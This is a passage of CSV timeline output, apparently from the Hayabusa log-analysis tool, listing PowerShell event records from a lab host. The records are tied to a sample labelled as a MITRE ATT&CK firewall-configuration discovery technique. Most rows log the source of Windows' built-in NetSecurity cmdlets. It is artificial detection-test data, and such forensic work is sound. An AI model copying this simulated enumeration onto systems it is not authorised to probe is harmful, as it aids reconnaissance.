$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallAddressFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""Set-NetFirewallAddressFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', 
